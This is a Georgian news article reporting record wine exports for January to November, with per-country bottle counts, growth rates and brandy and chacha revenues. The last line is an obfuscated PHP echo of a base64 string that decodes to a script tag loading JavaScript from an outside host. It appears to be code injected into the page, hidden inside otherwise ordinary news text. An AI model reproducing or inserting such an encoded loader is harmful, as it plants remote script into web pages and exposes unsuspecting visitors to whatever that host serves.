celsiusi
ავერსი საქკაბელი
მიმდინარე წლის იანვარ-ნოემბერში საქართველოდან ექსპორტირებულია 96,150,065 ბოთლი ღვინო, რაც დამოუკიდებელი საქართველოს პერიოდში ისტორიულად მაღალ მაჩვენებელს წარმოადგენს. 
 
როგორც საინფორმაციო სააგენტო WWW.BUSINESSTIME.GE-ის ღვინის ეროვნულ სააგენტოში განუცხადეს, ექსპორტირებული ღვინის რაოდენობა გასული წლის ანალოგიურ პერიოდთან შედარებით 14%- ით არის გაზრდილი.
 
ექსპორტირებული ღვინით მიღებული შემოსავალი 222 მლნ აშშ დოლარს აღწევს, რაც გასული წლის ანალოგიურ  მონაცემზე 4%-ით მეტია.
 
ქართული ღვინის სტრატეგიულ ბაზრებზე ექსპორტის ზრდის დინამიკა შენარჩუნებულია:  
 
პოლონეთი - 29% (5908393)
ჩინეთი - 26% (5469450)
აშშ - 12% (971714)
გერმანია - 13% (751810)
ლატვია - 10% (1634827)
ლიეტუვა - 44% (960928)
იაპონია - 12% (189844) და დიდი ბრიტანეთი -  76% (702640).
 
ზრდა აღსანიშნავია შემდეგ  ქვეყნებში: კანადა - 91% (317692), შვედეთი - 97% (119494), ჩეხეთი - 259% (141432), საფრანგეთი - 6% (84028), ისრაელი - 62% (422839), ყაზახეთი - 38% (3775978), აზერბაიჯანი - 21% (209987), თურქეთი - 209% (93330), უკრაინა - 11% (11667525), რუსეთი - 6% (55867692), მონღოლეთი - 174% (402810), ბელარუსი - 26% (4454009) და ა.შ.
 
საქართველოდან სხვადასხვა მოცულობის ღვინის ექსპორტი 421-მა კომპანიამ განახორციელა. ამასთან, საანგარიშო პერიოდში, ექსპორტირებულია 38,2 მლნ ბოთლი (0,5 ლ) ბრენდი, რაც 30%-ით აღემატება 2020 წლის ანალოგიურ მაჩვენებელს. ბრენდის ექსპორტით მიღებულმა შემოსავალმა 70,9 მლნ აშშ დოლარს მიაღწია (ზრდა 17%).
 
ექსპორტირებულია 760,3 ათასი ბოთლი (0,5 ლ) ჭაჭა, ექსპორტის ზრდამ 42% შეადგინა. ჭაჭის ექსპორტით მიღებული შემოსავალი 1,9 მლნ აშშ დოლარს აღწევს; ზრდამ, გასული წლის ანალოგიურ პერიოდთან შედარებით, 42% შეადგინა.
 
ღვინის, ბრენდის, ჭაჭის, საბრენდე სპირტისა და ჩამოსასხმელი ბრენდის ექსპორტის შედეგად მიღებულია 356,3 მლნ აშშ დოლარი შემოსავალი, რაც 12%-ით მეტია გასული წლის ანალოგიური პერიოდის მაჩვენებელზე.
 
 
1268
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");